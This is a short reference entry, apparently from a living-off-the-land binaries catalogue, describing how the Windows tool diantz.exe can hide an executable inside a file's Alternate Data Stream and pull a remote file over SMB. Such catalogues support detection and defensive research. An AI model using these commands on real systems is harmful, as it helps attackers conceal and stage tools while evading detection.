Binary that package existing files into a cabinet (.cab) file
Compress a file (first argument) into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
diantz.exe {PATH_ABSOLUTE:.exe} {PATH_ABSOLUTE}:targetFile.cab
Download and compress a remote file and store it in a CAB file on local machine.
diantz.exe {PATH_SMB:.exe} {PATH_ABSOLUTE:.cab}
Execute diantz directives as defined in the specified Diamond Definition File (.ddf); see resources for the format specification.
diantz /f {PATH:.ddf}